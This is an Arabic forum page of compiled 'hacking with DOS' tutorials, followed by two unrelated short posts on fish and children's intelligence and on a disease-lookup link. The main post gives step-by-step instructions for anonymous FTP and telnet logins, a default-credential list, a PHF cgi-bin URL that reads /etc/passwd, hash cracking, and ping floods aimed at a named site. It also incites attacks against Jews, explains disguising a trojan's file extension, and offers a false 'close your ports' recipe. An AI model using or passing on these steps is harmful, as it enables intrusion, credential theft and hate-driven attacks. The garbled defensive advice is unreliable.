التصنيفات
منوعات

كل المعلومات و طرق الاختراق و الهكر عن طريق الدوس ضروري تشوفو

السلام عليكم ورحمة الله وبركاته
تعلم الهكر واخطر اوامر الدوس

أخطر اوامر الدوس

أخطر أوامر الدوز التي يستخدموها الهكر المحترفين
)()(أخطر استعمالات وأوامر الDoS والمتداولة بين الهكرز)()( =][أدخل واتعلم][=

أوامر DoS مع الشرح سوف تجدها في هذا الموقع

nor2000.com

/****************************** *****************/

=========================
هذا المعلومات أنا محضرها لكم من أغلب المنتديات وأتمنى تعجبكم وتستفيدون منها

بسم الله الرحمن الرحيم

* لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع

User name-Password

وهما يكونان محفوظين في ملف يسمي

PASSWDغالبا

بعض المواقع تضع هذا الملف في الإف تي بي

ما هو إف تي بي؟

FTP=File Transfer Protocol بروتوكول نقل الملفات

تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت

start==>run إبدأ ثم تشغيل

واكتب telnet

سيفتح التلنت اضغط علىRemote System ==> connect

ثم اكتب الموقع في Host Name مثلا

kahane.org أو الآيبي الخاص به

وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي

ثم اضغط connect

وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code

user anonymous

ثم انتر بعدها يطلب السيرفر كلمة السر اكتب

pass zzzoozz@.com

اكتب أي بريد كلمة سر وطبعا سيكون وهميا

ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..

بعدها سنحصل على ملف الباسورد

قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل

cute ftp – ws_ftp

مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان

ftp.kahane.org

لتحصل على الملف في التلنت اكتب

retr /etc/passwd

/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسورد باختلاف نظام تشغيل الموقع

Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز ******s/passwd

وتختلف أسماء ملف الباسورد بين passwd و admin.pwl و غيرها

= = = = تابع = = = =

أغلب استخدامات الدوز والمعروفة

1-command هذا الامر يدخلك الى موجه الدوس .
2-regedit هذا الامر لمحر سجل الوندوز ( الشجرة ) .
3-icwscrpt هذا الامر خاص بنسخ ملفات ال dll
4-scandskw هذا الامر لعمل تفحص للاقرص .
5-imgstart هذا الأمر لتشغيل قرص ويندوز المضغوط
6-msiexec حقوق تركيب ويندوز .
7- : d : c للوصل السريع إلى الدرايفرات
8-hwinfo /ui لمعرفة معلومات عن جهازك وفحصه بالكامل عن طريق الدوس واعداد تقرير بذلك
9-cleanmgr وهذا الامر يشغل برنامج تنظيف القرص
10-packager وهذا الامر لبرامج يغير الايقونات
11-recent هذا الامر لإستعراض ملف المستندات ( الموجود في قائمة إبدأ
12– sysedit هذا الامر(لفتح محرر تكوين النظام) لويندوز 98. حيث يقوم بفتح هذه النوافذ الخمسة التالية :
protocol.ini
system.ini
win.ini
config.sys
autoexec.bat
13-sfc وهذا الامر لإسترجاع بعض ملفات ال dll عندما تتلف
14-taskman وهذا الامر لمشاهدة البرامج التي تعمل حاليا
15-debug لمعرفة نوع كرت الفيديو او الشاشة
16-DEFRAG لإلغاء تجزئة القرص
17-DVDPLAY مشغل افلام dvd يعمل مع ملينيوم
18-winipcfg لمعرفة IP
19-TEMP للوصل الى ملفات الويندوز المؤقتة
20– tuneup هذا الامر لتشغيل برنامج معالج الصيانة
21-mobsync هذا الامر لظهور برنامج تنزيل الصفحات من الانترنت و تصفحها بدون اتصال
22-cdplayer هذا الامر لتشغيل برنامج قاريء الأقراص المضغوطة
23-ftp هذا الامر لجلب البرامج بسرعه من الدوس .
24-Tips.txt هذا الأمر يظهر بعض أسرار ويندوز 98
25– telnet وهذا الامر يشغل برنامج telnet
26-progman وهذا الامر يأخذك الى قائمة البرامج.
27-drwatson أداة لتشخيص أخطاء النظام.
28-cliconfg.
29– mkcompat.
30-CVT1.EXE
هذا الأمر لتشغيل معالج محول محركات الأقراص إلى نظامfat32
31-SCANREG
مدق تسجيل ويندوزلتفحص التسجيل
32-Tune up
هذا الأمر لتشغيل معالج الصيانة ومن مهامه:
1/ تسريع البرامج المستخدمة بشكل متكر
2/ تدقيق القرص الثابت لاستكشاف الأخطاء
3/ حذف الملفات الغير ضرورية من الجهاز
ويمكن استخدام هذا الأمر لنفس الغرض TUNEUP.EXE
34-SYSEDIT
محرر تكوين النظام لا ينصح بتغير أي شيء فيها إلا من قبل الخبراء أو من لديهم معرفة تامة بالتعديلات التي يريدون عملها على هذا المحرر
35-VCMUI
أداة تعارض الإصدارة وظيفتها التحق من الملفات التي لديها رقم إصدارة احدث أو كانت بلغة مختلفة قبل تثبيت النظام لاستعادتها
شرح مبسط عن هذه الأداة:
أثناء تثبيت برامج جديدة، بما فيها ******s 98، قد يتم الكشف عن الإصدار القديمة لملفات
البرامج واستبدالها بالإصدار الجديدة. ويتم إنشاء نسخة احتياطية للإصدارت السابقة وتُحفظ
على القرص الثابت.
في حال وجدت تعارضات مع ملفات النظام أو ملفات البرامج بعد تثبيت تطبيق، تُستخدم إدارة تعارض
الإصدار لاستعادة ملف النسخة الاحتياطية.
وتذكر إدارة تعارض الإصدار كافة ملفات النسخة الاحتياطية، وتاريخ إجراء النسخة الاحتياطية،
وأرقام الإصدار لملفات النسخة الاحتياطية والملفات الحالية. وعند استعادة ملف النسخة الاحتياطية،
حينئذ، يتم إنشاء نسخة احتياطية للإصدار الحالي. ويبقى الإصداران متوفرين.
ملاحظة مهمة : يجب استخدام هذه الأداة من قبل شخص لديه معرفة متقدمة بالنظام
36-UPWIZUN
إلغاء تثبيت معالج التحديث وظيفته كالتالي:
ربما قد استخدمت ******s Update لتثبيت إصدار محدّث من أداة تصحيح،
أو برنامج تشغيل، أو أداة نظام. إذا قرت فيما بعد إلغاء تثبيت الإصدار الجديد،
ولم تتمكن من إعادة تأسيس الاتصال بإنترنت، استخدم إلغاء تثبيت معالج التحديث
للعودة إلى الإصدار السابق.
37-Asd.exe
أداة تشغيل عامل برنامج تشغيل التخطي التلقائي
وظيفته: يعرّف برنامج تشغيل التخطي التلقائي (ASD) حالات الفشل
التي تسبت في توقف ******s عن الاستجابة في عمليات بدء التشغيل السابقة
ويضع عليها علامات بحيث يتم تجاوزها في عمليات بدء التشغيل الاحقة.
يذكر ASD كافة الأجهزة أو العمليات التي فشل بدء تشغيلها. ويمكنك استخدام ASD لتمكين
أي جهاز تم تعطيله سابقاً بواسطة ASD، وسيحاول ******s استخدام الجهاز
في محاولة بدء التشغيل التالية. وفي حال الفشل، يتوقف الكمبيوتر عن الاستجابة.
وعند إعادة تشغيل الكمبيوتر مرة أخرى، يمنع ASD تشغيل العملية سامحاً لك بدء تشغيل الكمبيوتر

من العقرب الأحمر

——————————————–

———————————————————————

الدوس هو برنامج يأتي مع الويندوز وهو عبارة عن مواجهه خطية يتلقى الأوامر من المستخدم ويقوم بتنفيذها.هذا باختصار
والهكر عن طريق الدوس(DOS) له تأثير مرعب وقوي جداً وهذه بعض أوامر الدوس حتى نتعرف عليه أكثر:-
لتشغيل الدوس إذهب إلى إبدأ>تشغيل>وأكتب command أو (start>run

———————————————————————
1-أكتب الأمرmsconfig لمعرفة البرامج التي تعمل وقت التشغيل او عند بدء التشغيل ولتجنب الاختراق يمكنك عن طريق هذا الامر ثم إذهب إلى بدء التشغيل وانظر الى البرامج العامله وقم باطفاء أي برنامج غريب يعمل عند بدء التشغيل.
2- الأمر Control لفتح لوحة التحكم .
3- الأمر telnet لفتح نافذة التلنت والاتصال بجهاز بعيد بمعرفة الاي بي والبورت.
4- الأمر pi http://www.israel.org لمعرفة IP الموقع ويستعمل في الهجوم ضد الموقع. ملاحظه/هناك مسافه بين ping http. يمكنك تغير (israel.org) بأي موقع.
5- الأمر ping -twww.israel.org لارسال رسايل تتسب في انهيار الموقع عند اجتماع الكثير من المستخدمين على القيام بها ضد موقع معين .
6- الأمر netstat -n لاظهار IP أي شخص انت ترسل له ملف عبر الماسنجر اكتب هذا الامر بينما انت ترسل وسيظهر IP تبعه في موجة الدوس والاي بي تبعك انت ايضا.
7- الأمر winipcfg لمعرفة IP الخاص بك.
8- الأمر System.ini انظر الى السطر السادس ولابد ان يكون هكذا user.exe=user.exe والا فجهازك مخترق
9- الأمر regedit ثم اتبع الاتي

HKEY_LOCAL_MACHINE>SOFTWARE>Mi crosoft>******s>Curr entVersion>Run واي ملف يحمل امتداد exe واسمه name قم بحذفه فهو الباتش تقريبا .

———————————————————————

اما بخصوص بينق تدمير المواقع فهي كالتالي:-
1- pi http://www.israel.org لمعرفة IP الموقع.
2- ping http://www.israel.org يحمل الضغط على الموقع المستضيف.
3- ping -t -a http://www.israel.org يقوم بإعطاء أوامر إلى المستضيف.
4- ping -w timeo http://www.israel.org قوم بتوضيح سرعة الموقع الحالية.

———————————————————————

10- كيف تستخدم اوامر الدوس في بعض الهجوم
con/con.wav
com1/com1.wav
com2/com2.wav
التفاصيل هنا

============================== ==

طريقة تغير امتداد exe عن طريق الدوس جديد

اتبع الخطوات التالية:-
إبدأ>تشغيل>وأكتب command أو (start>runcopy server.exe server.com طبعا server هو اسم الباتش تبعك وممكن تغير الامتداد الى com,scr,bat إخواني المسلمين لاتستخدموا هذه الطريقة ضد إخوانكم المسلمين وانما استخدموها ضد الكفار كما هو هدف الموقع وبخوصا اليهود قاتلهم الله ولعنهم.

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= *=*=*=*=*=*=*=*=*=*=

*=*=*=*=*

()()(هجوم الدوز المخيف)()(

———————————————————————

هجوم DOS هو واحد من أخطر أنواع الهجمات الموجودة في الفضاء الافتراضي، وهو يكلف عالم الأعمال ملاين الدولارات كل عام، كما يشكل تهديداً حقيقياً لأي نظام أو شبكة موجودة على طريق المعلومات السريع، تتعلق هذه التكلفة بزمن تعطل النظام، ضياع الموارد، والعمل الفيزيائي الازم لتحليل والرد على هذا النوع من الهجوم.

ليس المقصود ب DOS نظام التشغيل الشهير من مايكروسوفت، إنما المقصود هو هجوم رفض الخدمة Denial of Service Attack ، حيث يقوم المخترق بهذا الهجوم بهدف التخريب والتدمير، وهو لا يحتاج إلى مهارة عالية أو معرفة تقنية عميقة لأن الأدوات الضرورية متاحة ويمكن بسهولة تحميلها من الإنترنت.

أصابت هجمات DOS العديد من المواقع المهمة والضخة مثل CNN, , Bay, ZDNet…. وغيرها، ما أدى إلى توقفها تماماً عن العمل لفترات مختلفة، حدث ذلك في شهر فيبراير من العام 2000.

يعتمد هذا الهجوم على استغلال نقاط الضعف في بروتوكول (TCP/IP) المصمم للعمل أساساً في بيئة آمنة مفتوحة، ما جعله يحوي العديد من الثغرات التي يمكن أن يستخدمها المخترقين Crackers.

من المفارقات في هذا الموضوع أن المخترقين المحترفين وحتى المخربين منهم يعتبرون هذا النوع من الهجوم أنه رديئ ويسخرون من يقومون به باعتباره أنه اسلوب المبتدئين، ولا يحتاج إلى معرفة وخبرة.
———————————————————————
يوجد العديد من أنواع الهجوم DOS سوف أحاول أن أسردها باختصار:
1-استهلاك عرض الحزمة Baud rate consumption
حيث يقوم المهاجم باستهلاك كامل عرض الحزمة في نظام شبكة الضحية وذلك باغراق شبكة الضحية بكمية هائلة من الطلبات مثل: GET, SYN… وغيرها، ما يؤدي إلى استهلاك كامل عرض الحزمة وإيقاف الموقع المستهدف أو النظام المهاجم تماماً عن العمل، ويكون ذلك إما بالهجوم مباشرة Direct Attack حيث ينتصر في هذه الحالة من لديه عرض حزمة أكبر ( مثلاً 56-Kbps في مواجهة 128-Kbps )، أو القيام بربط العديد من المواقع من أجل إغراق نظام الضحية حيث يقوم المهاجم باستخدام أنظمة البث broadcast في شبكات أخرى من أجل تضخيم الهجوم، ويستفيد في هذه الحالة من عرض حزمة تلك الشبكة.
من الجدير بالذكر في هذا الصد أن برنامج الدرة من عمران يستخدم هذا النمط من الهجوم، على الرغم من أني لم أقم بعد بتحليله كاملاً بعد، إلا أني أستطيع القول من التحليل المبدئي على أنه يقوم بارسال طلبات GET حسب بروتوكول HTTP إلى النظام المستهدف وهو في هذه الحالة Web server ما يؤدي إلى زيادة الحمل على المزود المستهدف، يقوم البرنامج بذلك عن طريق إنشاء عدة Threads تعمل كل منها على أنها Process مستقلة تقوم بارسال طلبات GET المذكورة، إن فعالية هذا الهجوم قليلة حيث أن المستخدم مهما استخدم من عرض الحزمة لديه فلن يتمكن أبدا من مجاراة عرض حزمة المواقع الكبيرة، إلا أن القوة الحقيقية تكون عند التنسيق بين المئات أو الآلاف من مستخدمي هذا البرنامج بحيث يتم الهجوم على هدف محد في وقت معين بدقة، وهذا مايقوم به برنامج الدرة حيث أنه يقوم بالاتصال بالموقع xxxxx.xxx (الموقع ليس سريا ويمكن بسهولة معرفته إلا أني لن أذكره إلا إذا رغب عمران بذلك) ويحصل منه على أهداف الهجوم، ثم يقوم بالهجوم. (شكرا ل Sp@nder على تزودي بنسخة من برنامج الدرة).

2-استهلاك الموارد: هذا النوع من الهجوم يعتمد على استهلاك الموارد في نظام الضحية عوضا عن استهلاك عرض الحزمة. أهم الموارد التي يتم استهدافها هي: CPU, Memory, Kernel, File system … وغيرها، و يؤدي انخفاض الموارد في النظام إلى عدم استقراره وانهياره في نهاية الأمر.

3- الثغرات البرمجية أو في مكونات النظام:
لا يوجد نظام أو برنامج خالي تماماً من الثغرات مهما بلغت دقة تصميمه، يوجد عدة طرق لاستغلال هذه الثغرات مثلا بارسال Packets غير متوفقة مع المعاير القياسية ل بروتركول TCP/IP المحدة من قبل RFC إلى نظام الضحية ما يؤدي إلى نتائج تختلف حسب نوع البرنامج من توقف الخدمة، أو توقف النظام، أو ضياع المعلومات، أو فيضان المكدس stack وغير ذلك.
والأسوأ من هذا استخدام الثغرات الموجودة ضمن المكونات الصلبة للنظام Hardware مثل ثغرة Pentium f00f DOS الشهيرة، حيث يؤدي تنفيذ شفرة الآلة opcode التالية 0xf00fc7c8 على أنظمة تعتمد معالجات بنتيوم إلى توقف النظام عن العمل تماماً.
لسوء الحظ لا يمكن الكشف عن هذا النوع من الثغرات إلا بعد وقوع الهجوم. ولا أحد يعلم تماماً فيما إن كانت هذه الثغرات موجودة عن طريق الخطأ أم أنها موضوعة هناك عن عمد لسب ما…… ؟؟؟؟؟!!!!!!! الله أعلم

كما يوجد أنواع أخرى من هجمات DOS إلا أنها أقل فعالية وغير مستخدمة على نطاق واسع.

كنت أنوي أن أتحدث عن طرق الحماية من هجوم رفض الخدمة إلا أن الموضوع طويل ويحتاج إلى عدة مقالات لمناقشته، إلا أن المهم بالنسبة للمستخد المنزلي هو إخفاء رقم IP الخاص به واستخدام أحد برامج الجدران النارية مثل ZoneAlarm, PcConseal …وغيرها، وطبعا أخذ الحذر في مواقع المنتديات والدردشة وخاصة منتدى الشبكات والسيرفرات في موقع فلاشيات 😉
———————————————————————

مايتطسع فعله netstat

============================== ================

NETSTAT حالة الشبكة يظهر جميع المنافذ المتصلة
NETSTAT مسافة-A يظهر ارقام الايبي المتصلة وحالتها
NETSTAT مسافة-E يظهر حالة الشبكة بشكل عام
NETSTAT مسافة-N يظهر ارقام البورتات والايبيات المتصلة
NETSTAT مسافة-P يظهر البروتوكولات المتصلة بجهازك
NETSTAT مسافة-R يظهر اجهزة الروترز في شبكتك
NETSTAT مسافة-S يظهر حالة الشبكة والاجهزة المتصلة

============================== =================

درس مهم لتعلم الاختراق بالtelnet
nor2000.com

درس مهم لتعلم الاختراق بالnetbios
nor2000.com

++++++++++++

FTP
أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت
21
مفتوح و هو البورت الخاص ب
FTP
و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها
Superscanne
بعدما تتأكد ان البورت مفتوح نتقل الى الخطوة الثانية و هي
إضغط على
Start
ثم
Run
ثم اكتب
ftp –n
تطلع لك نافدة في الدوس مكتوب عليها
FTP&g
لحد هنا كل شيء تمام
و بعدين اكتب
Open
ثم إضغط على
إدخال
Enter
تتحصل عب النتيجة التالية
FTP&g
To
أكتب جنب
To
رقم IP الضحية ثم إضغط على إدخال
و الحين اهم جزء

إدا تحصلت على هذا الرد فقد تخطيت خطوة
Connected to Assassin.com
220 websrv1 Microsoft FTP Service (Version 4.0).
و الآن أكتب الكتابة التالية
ftp&gquote user ftp
إدا تحصلت على هذا الرد فقد تخطيت خطوة
331 Anonymous acces allowed, send identify (e-mail name) as password.
و الآن أكتب الكتابة التالية
ftp&gquote cwd ~root
إدا تحصلت على هذا الرد فقد تخطيت خطوة
530 Please login with USER and PASS
ثم أكتب الكتابة التالية
ftp&gquote pass ftp
إدا تحصلت على هذا الرد فقد تخطيت خطوة
و نجحت في الإقتحام يعني الاختراق

230 Anonymous user logged in.
مبروك انت الحين في جهاز المسكين ذا الي بتحوسه
ما عليك الآن الا ان تقوم بإستعمال
اوامر الفتيبي
و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي و إذا اردتم ان تضحكو بقاليأكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء وعشان كذا
قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق

Pwd
لكي تعر ما يحتويه الهارد ديسك
Cd
لإقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
لكي تحمل الى سطح المكتب بتاع جهازك
مثال
Get black.exe
Put
العملية الع**ية ل
Get
يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Clos
لقطع الإتصال مع الضحية

هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها
Codes: Signification:
110 Restart marker reply.
120 Service ready in nnn minutes. (nnn est un temps)
125 Data connection already open; transfer starting.
150 File status oka about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message.
215 NAME system type.
220 Service ready for new user.
221 Service closing control connection.
225 Data connection open; no transfer in progress.
226 Closing data connection.
227 Entering passive mode (h1, h2, h3, h4, p1, p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pendingfurther information.
421 Service not available, closing control connection.
425 Can’t open data connection.
426 Connection closed; transfer aborded.
450 Requested file action not taken. (Fichier déjà utilisé par autre chose)
451 Requested action aborded: local error processing.
452 Requested action not taken. (Pas assez de mémoire pour exécuter l’action)
500 Syntax error, command unrecognized.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. (Fichier non trouvé, pas d’accès possible,…)
551 Requested action aborded: page type unknown.
552 Requested file action aborded.
553 Requested action not taken. (Nom de fichier non attribué)
————————
Telnet
ما هي التيل نت ؟
التيل نت هي أداة قديمة في لينوكس(Linux) وينوكس(Unix) وأصبحت الآن موجودة في ويندوز .
==========================
كيف يتم استخدامها سابقا ؟
كانت تستخدم للتصفح بحيث ان مواقع الانترنت كانت مجرد نصوص بدون صور … تخيل كم كانت الشبكة كئيبة …
==========================
كيف يتم استخدامها الآن ؟
1 قراءة بريدك الالكتروني بالطريقة التالية :
اذهب إلى متصفحك واكتب telnet://.com:25 وسوف يطلب اسم مستخدم وكلمة مرور(طبعا بعد ان يفتح التيل نت) ضع اسم بريدك وكلمة السر الخاصة بك واقرأ بريدك واتخدم الأمر Del msg#1 لحذف الرسالة الأولى وغير الرقم 1 برقم الرسالة المراد حذفها .
==================
2 اختراق الأجهزة :
ولها نفس الفكرة بحيث تقوم بالاتصال بجهاز على اساس انه سيرفر بإمكانك حذف إضافة إزالة الملفات فيه …
تتم أيضا بنفس الطريقة من متصفحك اكتب Telnet://IPNumberort حيث أن IPNumber هو رقم الآي بي الخاص بالضحية اما port هو رقم المنفذ القابل لإجراء التيل نت عليه وهو يفترض أن يكون أحد المنافذ التالية :
21 – 25 – 32(الأساسي) – 99 – 2001
والعديد العديد من المنافذ الأخرى وهذه فقط على سبيل المثال
==================
3 اختراق المواقع :
يجب أن يكون في الموقع منفذ قابل للتيل نت(قم باستخدام ShadowSecurityScanner لهذا الغرض) تجده في مو http://packetstorm.securify.com/ قم بالضغط على الوصلة التي سوف تظهر لك ثم ابحث عن البرنامج باسمه أو باسم SSS .
المهم بعد ما تتصل بالتيل نت للموقع حاول أن تدخل باي يوزنيم او باسورد من التالية أو غيرها :
اسم المستخدم : كلمة المرور
anonymous : anonymous
guest : guest
root : root
sys : sys
sys : sysadm
sys : system
games : games
ftp : ftp
mail : mail
وإن لم تنجح(في حال كون نظام التشغيل في السيرفر ينوكس Unix ويمكنك معرفته بواسطة البرنامج المذكورة أعلاه) جرب التالية :
young
test
لاحظ أنها غير محمية بكلمة سر وتسمى unpassworded accounts
أي الحسابات الغير محمية بكلمة سر .
اكتب الأمر :
GET /etc/passwd و GET /etc/group و GET /etc/shadow
ملاحظة : بعد كتابة كل أمر يجب أن تظيف :
data = download
لكي تتمكن من التحكم بالملفات .
============================== =====
ماهو الملف psswd ?
الملف ذا فضيحة فيه باسورد صاحب الموقع …وباسوردات غيرها بكثير من ظمنها باسورد الroot .
ملاحظة للمبتدئين : الroot هو الشخص الذي يستطيع التحكم بكل شيء وتخريب وتدمير كل شيء من دون أن يوقفه النظام وبإمكانه أن يكون أي مستخدم على الشبكة بواسطة الأمر su username ولن يحتاج إلى باسورد .
هذا الملف في ثلاث حالات :
1 مغير اسمه وصعبة نبحث لان الملفات الموجودة في الملف etc/ كثيرة جدا .
2 معمول له shadow وليس هناك طريقة لفك الshadow أو ما يسمى بunshadow .
3 متروك مثل ما هو ..
لنفترض أنه كان في الحالة الثالثة هل ستجد الباسوردات بسهولة ؟؟ لا وألف لا
الباسوردات مشفرة … سوف تراها كالمثال التالي :
sirhack:89fGc%^7&a, Ty:100:100: Sir Hackalot: /usr/sirhack:/bin/sh
هنا سوف نعرف المعلومات التالية:
1 اسم المستخدم : sirhack .
2 كلمة السر : 89fGc%^7 .
3 الاسم الحقيقي : Sir Hackalot .
4 مجلد الحساب : usr/sirhack/
5 الغلاف(هنا الكلام في ينوكس او لينوكس) : bin/sh/
كما رأيتم فكلمة السر مشفرة .
============================== =====
ما هو الملف group ?
هذا الملف يحوي اسماء المستخدمين مع كلمة السر(مشفرة ثانية) وحالاته نفس حالات الملف passwd إلا أنه لا يغير تسميته .
============================== =====
ما هو الملف shadow ?
في حالة كون الملف psswd مشفر سوف نحتاج إلى هذا الملف لانه لن يكون مشفرا …
============================== =====
كيف أفك التشفير ؟
استخدم أحد برنامجين :
1 Cracker Jack .
2 John the ripper .
وكلهما يوجد منهما نسخة لويندوز ونسخة للينوكس() …

نسخة الينوكس
John the Ripper password cracker

نسخة الويندوز
John the Ripper password cracker

++++++++++++++++++++++++++++++ ++++++++++++++++++++

التل نت اداة فقط بس هذي الاداة ضرورية في كل شي المهم راح اشرح اليوم طريقة الاختراق جربتها مره وصارت
وهي تعتبر من اسهل طرق الاختراق
خلينا نفسم الدرس الى اربع اقسام

بسم الله بدانا
القسم الاول:
اول شي ضروري نعرف بعض الاوامر اليونكس السهلة
HELP = HELP
COPY = CP
MOVE = MV
DIR = LS
DEL = RM
CD = CD
هذي مهمة جدا لنبدأ التعليم
واكو بعد WHO هذي اذا تعرف منو موجود على السيرفر وبعد اكو FINGER (اسم المستخدم) بين FINGER اسم المستخدم مسافة بدون الاقواس المهم ويا هذي الاوامر راح نقدر نتماشى ويا الدرس

القسم الثاني:
نظام اليونكس او السيرفر مالته يحتفظ في كلمات السر في etc directory/ واسم الفايل passwd انته هسه تتوقع انك بس حصلت هذا الملف انتهى الموضوع وصرت هاكر لا
انته غلطان ميه بالميه لانو الباسيوردات مشفره ومستحيل تقدر تطلع الباسيورد منها
بس اكو حل اكو برنامج اسمه Cracker Jack هو مثل القاموس للتشفير يحتوي على الكثير من الباسيودات تقدرتنزله http://www.geocities.com/SiliconValley/9185
وتقدر تحصل باسيوردات اكثر في sable.ox.ac.uk/pub/wordlists تنزله هو حوالي 4 ميجا بايت مظغوط يصير 8 ميجا بايت لاوم تحطه في ملف البرنامج
انا ان شاء الله راح اشرح برنامج Cracker Jack عن قريب بس اكو فايل موجود في البرنامج يعلمك المهم

القسم الثالث(الاصعب):
النظام يحفظ الباسيوردات احنا ما نقدر ندخل على السيستم لانو احن مو مصرح لنا المهم شلون نجيب ملف الباسيورد في طريقتين سهلات بس احيانا تشتغل
اولها تدخل للسيتم كانك anonymously لما تدخل مرات ftpمايكون مانع الدخول لملف الباسيوردات انته عليك تسوي etc directory/ تشوف اذا الباسيورد عليها حظراو لا اذا
ماكو عليها حظر بسهولة نزل ملف الباسيورد وشغل البرنامج Cracker Jack وطلع الباسيورد ومبروكة عليك بس اذا جان عليها حظر لازم تجرب الخطة الثانية في ملفات اسمها PHF هذي تحوي على كل شي باسيوردات وملفات والتحكم

فانته شلون تدخل عليها تفتح الاكسيبلوير
http://xxx.xxx.xxx/cgi-bin/phf?Qali…t%20/etc/passwd
ملاحظة بدال الاكسات تكتب عنوان الموقع انا نجحت بالدخول على موقع عن طريق هذا بالمناسبة تقدر تخترق منتدى عن طريق هذي الحركة
اذا ما نجحوا الحركيتن معناها الباسيورد مضل يعني موجود هذا النظام لحفظ الباسيوردات الي انته ما تقدر تدخل عليها بس ماكو شي مستحيل
مرات في بعض الانظمة يكون السيستم بيه backup للباسوردت وتقدر تبحث عنه مثلا في etc/shadow/ بس يمكن تشتغل ويمكن ما تشتغل انته وحظك
ولهذا السب انا معجب جدا في نظام apache لانه نظام رائع جدا ولايمكن اختراقه بسهولة

الجزء الرابع:
زين هسه حصلت الباسيوردمال اليوزر نيم الي تريد تخترقه شلون تقدر تاخذها الك؟؟
شوف
تفتح التل نت وتدخل على السيرفر وتكتب اليوزر نيم والباسيورد بعدني تقدرتسوي الي يحلو لك طبعا لكل سيرفر اوامر يوجد امثلة على السيرفر

UNIX,linux, aix, irix, ultrix, bsd, or sometimes even DOS or Vax / Vms)

ملاحظة:يا اخوان انا لو اعرف نظام اليونكس جيدا كان جعلت من نفسي هاكر قوي ولكني كنت تحت غشاوة البرامج بس هسه الحمد لله بديت اتعلم اليونكس ثم سابدا بنظام اليونكس
وان شاء الله ذلك سيساعدني على جعل من نفسي كل الهاكرز الحقيقن يعتمدون على اليونكس وليش على البرامج فيا اخوان شيلوا عنكم غشاوة
السب سفن وغيره وما عليك الا تتعلم من كتب او تاخذ كورس براحتك وانا مستعد اورك ابواب مال الهاكرز راح تتعجب انا ما اقور هذا الكلام ني خبير او اي شي ثاني
اقوله دعوة الكم والي حتى نبدأ بالطريق الصحيح للهاكرز

الطاعون
+++++++++++++++++++++++++++

إغلاق المنافذ port الموجودة بالجهاز

اول شيء بقوله انه الكثير منا قد يتخوف من الهاكر واكثر البرنامج ( الفايرول ) الجدار الناري قد تفى بالغرض ولكن لو لم تستخدم بطريقه سليمه فيكون وجودها مثل عدمها ……

اقدم لكم هذه الطريقه التى عن طريقها تستطيع تقفيل جميع البورتات ( الثغرات الامنيه ) الموجوده بكل الاجهزه .

اتمنى اتباع الطريقه كما هي :
إدهب إلى:
Start&gRun ابداء &l تشغيل

واكتب الامر التالي
command.com

ستظهر لك نافذة إكتب فيها:
ping host

و إضغط enter ثم إنتظر و اكتب:
ping port

و إضغط enter

ثم إنتظر و اكتب:
ping port1027
وإضغط enter
و إنتظر ثم إكتب:
ping port80

و إضغط enter
ثم اكتب:
ping
و إضغط enter

ثم اكتب:
ping port
و إضغط enter

و الآن إنتهت المهمة.. لقد قمت بتقفيل بورت في ال الخاص بك و لقد تم منع دخول الهاكرز من تلك الثغرة الأمنية.
اتمنى الموضوع يعجبكم لا تنسوني بالردود




التصنيفات
الاستشارات الخاصة و استشارات الصحة و الطب

الأسماك تزيد من قدرة الأطفال على استيعاب المعلومات

الأسماك تزيد من قدرة الأطفال على استيعاب المعلومات

باريس: أفادت دراسة علمية حديثة بأن الأسماك تزيد من قدرة الأطفال على استيعاب المعلومات، كما أنها تؤثر بطريقة مباشرة على المخ.
ويرجع ذلك لاحتوائها على الفوسفور الذي يساعد على تطوير الخلايا العصبية في المخ.
وأوضحت الدراسة أن الأطفال الذين يتناولون الأسماك بصفة منتظمة تجعلهم أكثر ذكاءً من الآخرين، ولذا ينصح العلماء بتناول الأسماك مرتين في الأسبوع على الأقل خاصةً بالنسبة للأطفال وذلك لتنمية الخلايا العصبية في المخ .
يذكر أن تناول الأم الحامل للأسماك مفيد جداً لتطور أدمغة جنينها.
:15_5_10[1]:




الله يعطيكي العافيه حبيبتي



التصنيفات
العناية بالبشرة و الجسم

اكتبي اسم المرض ويطلعلك كل المعلومات عنه ما رح تندموا اتفضلو للعناية بالشعر

صباحمساء الخير للجميع
بسم الله الرحمن الرحيم

كل ما عليكم الدخول عن طريق الرابط التالي

وكتابة اسم المرض

]وسوف يأتيكم تقرير مفصل عن المرض

http://go.3roos.com/5457vb43n4z

(((منقول ))):a5bdf2b232:




روعة ياعمري



شكرا جدا جدا رائع



مشكروره على الموضوع من جد روعه تسلمين يا قمر



